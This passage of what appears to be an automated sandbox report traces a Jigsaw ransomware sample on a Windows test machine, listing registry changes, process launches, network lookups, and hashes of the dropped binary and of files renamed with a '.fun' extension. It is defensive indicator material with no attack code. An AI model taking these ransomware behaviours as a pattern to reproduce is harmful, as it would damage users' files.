| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Send To OneNote 2016 = "winspool,nul:,15,45" | C:\Windows\System32\spoolsv.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:" | C:\Windows\System32\spoolsv.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45" | C:\Windows\System32\spoolsv.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45" | C:\Windows\System32\spoolsv.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices | C:\Windows\System32\spoolsv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Devices | C:\Windows\System32\spoolsv.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:" | C:\Windows\System32\spoolsv.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:" | C:\Windows\System32\spoolsv.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:" | C:\Windows\System32\spoolsv.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45" | C:\Windows\System32\spoolsv.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts | C:\Windows\System32\spoolsv.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45" | C:\Windows\System32\spoolsv.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Send To OneNote 2016 = "winspool,nul:" | C:\Windows\System32\spoolsv.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts | C:\Windows\System32\spoolsv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts | C:\Windows\System32\spoolsv.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Send To OneNote 2016 = "winspool,nul:" | C:\Windows\System32\spoolsv.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45" | C:\Windows\System32\spoolsv.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:" | C:\Windows\System32\spoolsv.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Send To OneNote 2016 = "winspool,nul:,15,45" | C:\Windows\System32\spoolsv.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45" | C:\Windows\System32\spoolsv.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:" | C:\Windows\System32\spoolsv.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices | C:\Windows\System32\spoolsv.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe
"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe"
C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Downloads\ShowConnect.mht
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0x120,0x124,0xfc,0x128,0x7ffb7ffc46f8,0x7ffb7ffc4708,0x7ffb7ffc4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,17103721558146777487,14580073802057630622,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2028 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,17103721558146777487,14580073802057630622,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,17103721558146777487,14580073802057630622,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,17103721558146777487,14580073802057630622,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,17103721558146777487,14580073802057630622,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\vcredist2012_x86_0_vcRuntimeMinimum_x86.log
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\b4b2597ca91442b88eea24723abaa22f /t 3068 /p 3428
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb91f9ab58,0x7ffb91f9ab68,0x7ffb91f9ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1724 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2272 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3120 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3140 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4420 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4100 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4688 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3924 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1740 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1844,i,18079249652616784200,2035754481317327268,131072 /prefetch:8
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\e3ffa307a7d0471fa6045809606adf9c /t 180 /p 1768
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\vcredist2012_x86_0_vcRuntimeMinimum_x86.log
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| N/A | 239.255.255.250:3702 | udp | |
| N/A | 239.255.255.250:3702 | udp | |
| US | 8.8.8.8:53 | c.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
memory/4028-0-0x00007FFB83275000-0x00007FFB83276000-memory.dmp
memory/4028-1-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp
memory/4028-2-0x0000000000F60000-0x0000000000F98000-memory.dmp
memory/4028-4-0x000000001BA70000-0x000000001BF3E000-memory.dmp
memory/4028-3-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp
memory/4028-5-0x000000001BF40000-0x000000001BFDC000-memory.dmp
C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
| MD5 | 2773e3dc59472296cb0024ba7715a64e |
| SHA1 | 27d99fbca067f478bb91cdbcb92f13a828b00859 |
| SHA256 | 3ae96f73d805e1d3995253db4d910300d8442ea603737a1428b613061e7f61e7 |
| SHA512 | 6ef530b209f8ec459cca66dbf2c31ec96c5f7d609f17fa3b877d276968032fbc6132ea4a45ed1450fb6c5d730a7c9349bf4481e28befaea6b119ec0ded842262 |
memory/4028-19-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp
memory/3428-20-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp
memory/3428-21-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp
memory/3428-22-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp
memory/3428-23-0x000000001B5B0000-0x000000001B5B8000-memory.dmp
memory/3428-254-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp
memory/3428-255-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp
memory/3428-256-0x00007FFB82FC0000-0x00007FFB83961000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\{5F535ACF-FADC-4643-A2F0-24045D70E4A2} - OProcSessId.dat.fun
| MD5 | 8ebcc5ca5ac09a09376801ecdd6f3792 |
| SHA1 | 81187142b138e0245d5d0bc511f7c46c30df3e14 |
| SHA256 | 619e246fc0ac11320ff9e322a979948d949494b0c18217f4d794e1b398818880 |
| SHA512 | cec50bfc6ad2f57f16da99459f40f2d424c6d5691685fa1053284f46c8c8c8a975d7bcb1f3521c4f3fbdc310cf4714e29404aa23be6021e2e267c97b090dc650 |
C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\invalid32x32.gif.fun
| MD5 | 580ee0344b7da2786da6a433a1e84893 |
| SHA1 | 60f8c4dd5457e9834f5402cb326b1a2d3ca0ba7e |
| SHA256 | 98b6c2ddfefc628d03ceaef9d69688674a6bc32eb707f9ed86bc8c75675c4513 |
| SHA512 | 356d2cdea3321e894b5b46ad1ea24c0e3c8be8e3c454b5bd300b7340cbb454e71fc89ca09ea0785b373b483e67c2f6f6bb408e489b0de4ff82d5ed69a75613ba |
C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.fun
| MD5 | 829165ca0fd145de3c2c8051b321734f |
| SHA1 | f5cc3af85ab27c3ea2c2f7cbb8295b28a76a459e |
| SHA256 | a193ee2673e0ba5ebc5ea6e65665b8a28bd7611f06d2b0174ec2076e22d94356 |
| SHA512 | 7d380cda12b342a770def9d4e9c078c97874f3a30cd9f531355e3744a8fef2308f79878ffeb12ce26953325cb6a17bc7e54237dfdc2ee72b140ec295676adbcb |
C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat.fun
| MD5 | f22599af9343cac74a6c5412104d748c |
| SHA1 | e2ac4c57fa38f9d99f3d38c2f6582b4334331df5 |
| SHA256 | 36537e56d60910ab6aa548e64ca4adafdcabde9d60739013993e12ba061dfd65 |
| SHA512 | 5c8afc025e1d8342d93b7842dc7ef22eca61085857a80a08ba9b3f156ee3b814606bb32bc244bd525a7913e7915bdf3a86771d39577f4a1176ade04dc381c6d4 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133626047950574231.txt.fun
| MD5 | c408fe54ebacb4f32d787b81ef224d39 |
| SHA1 | e3d2528a5ff4a52c9e2d9ab562a04a2c710da1c7 |
| SHA256 | 99262dd9d9e4a7219143051937efbd2a98fe5db1d1e60dbfc2bc6601fc01efc8 |
| SHA512 | 7556ab93b16b72f3c9d619b30e574b67f95a1983ed5dd05e63ef33b23893ab3768b4d139691b4fb36490c1d5170854bb954aa17adc8446eb204847caa20e0012 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133626052813607644.txt.fun
| MD5 | 4f162a341c5623f4f9fb48bde1bd8687 |
| SHA1 | 3c4f2000b4b73b9e32eb8bc28f2a9b50c06bfef9 |
| SHA256 | aaacfbd30fec8f67ef3119075b1ce9e81afc6b7ceffc6e9f55c5fa6fcd13ce46 |
| SHA512 | 3b6d1146b4a75c5d4def3d80a2981baaaabf016580b0671b65195b555263a05139c2c79b15efa2cfcc24ce3aada0e1c643bec9ef0dc9a12aee454eeeeea8ead8 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133626055682919415.txt.fun
| MD5 | 0c4039e2bc1d499f82cc957a90885637 |
| SHA1 | 01ca3eedaf8d2ea5311722a37755285288b72fac |
| SHA256 | c08e5c75b9dc71a283489dd7e3fd97b55fd5c7a8e1032d1b19ba780f693c39e3 |
| SHA512 | 27fa753b784246affa1f4e911595503af53a422e5938b481649392c7d8efc1d3ccda19a45d0abad2027298b2dc1f7599dd0bed95c96c9fd05938a978e32d4b6a |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fbf257de-6570-4630-902c-10acf3a7613b}\0.1.filtertrie.intermediate.txt.fun
| MD5 | 1fd532d45d20d5c86da0196e1af3f59a |
| SHA1 | 34adcab9d06e04ea6771fa6c9612b445fe261fab |
| SHA256 | dae6420ea1d7dbe55ab9d32b04270a2b7092a9b6645ed4e87ad2c2da5fdd6bae |
| SHA512 | f778cd0256eda2c1d8724a46f82e18ab760221181f75649e49dd32e9a2558bec0e9c52c5306ad17b18ab60395d83c438742103fe9adddf808e40c3d8384ea0b0 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fbf257de-6570-4630-902c-10acf3a7613b}\0.2.filtertrie.intermediate.txt.fun
| MD5 | f405f596786198c6260d9c5c2b057999 |
| SHA1 | f8f3345eb5abc30606964a460d8eef43d3304076 |
| SHA256 | 58e3090edb9316d9141065ac654a08169f2833091e6eb3a53b5a774a61b7e30a |
| SHA512 | a0b3573dae218ade265709a6fdee5f7700c9754eb10747de5af34af340ae95909d0a8902159a735e82eb5d7091f50a7997113661a7ec3fcc2b408fb6c78a4c39 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg.fun
| MD5 | 75a585c1b60bd6c75d496d3b042738d5 |
| SHA1 | 02c310d7bf79b32a43acd367d031b6a88c7e95ed |
| SHA256 | 5ebbfc6df60e21044486a5df3cb47ccdcd7a4d5f197804555715ffd9bf6c5834 |
| SHA512 | 663a302e651b9167f4c4e6ae30028307b4d8da0dda3a0e5fd414104951d50419862fc9396c5b39fe5c4b696efd3efbf0b575688983b1d341f3ef38becf500505 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.fun
| MD5 | 409a8070b50ad164eda5691adf5a2345 |
| SHA1 | e84e10471f3775d5d706a3b7e361100c9fbfaf74 |
| SHA256 | a91790b778026db625c9dedfe1c6d94b884818b33d7977e86b2f9c2f3c500796 |
| SHA512 | 767a75edd37d29b3433040ce21cda849cd11ba549f27581f7edc6416c433ba7047c56908d40956422393ab0f35ede61617d4bd2aad0bde3d1ebd276584c858c7 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png.fun
| MD5 | 880833ad1399589728c877f0ebf9dce0 |
| SHA1 | 0a98c8a78b48c4b1b4165a2c6b612084d9d26dce |
| SHA256 | 7a27d891097df183fbf0031e3894bdac0ce77aef15d666ddd9f6a04e9836fb27 |
| SHA512 | 0ddf247892a72a390437390d535debf6e41d12e51b31eb4f0353b710ec380c5fbc531a48e76935088063a41aca843287d3def9c1cd46be05b8dcb69f5017a464 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.fun
| MD5 | 2884524604c89632ebbf595e1d905df9 |
| SHA1 | b6053c85110b0364766e18daab579ac048b36545 |
| SHA256 | ae2facd997527426fc4def82e0db68be29b44499bfff86a28c36f7c31b177d4f |
| SHA512 | 0b506397627823a1768796129c6b37d146821471b89338b5f2d0fd3aea707fd46a8e197ee0e298ddfb3b50eef0a0b064946006346b060f733ef19cbd5d24fc90 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.fun
| MD5 | e092d14d26938d98728ce4698ee49bc3 |
| SHA1 | 9f8ee037664b4871ec02ed6bba11a5317b9e784a |
| SHA256 | 5e8ec278a273be22199884d519a79f748801baa3a45b76e57569fdfffe96e7fb |
| SHA512 | b2fcb5d46339cdf6b5a954f2a083cf913779e57cb6e8699bc5da1fba1c370c41117b7ddefb50075622067eb7b02a20268bc047171bd883bcda4a497c2ec64ea4 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons.png.fun
| MD5 | 65368c6dd915332ad36d061e55d02d6f |
| SHA1 | fb4bc0862b192ad322fcb8215a33bd06c4077c6b |
| SHA256 | 6f9c7ebec5a707de439e3fd2e278fdfa07a39465d56157b70b24f091509bf76f |
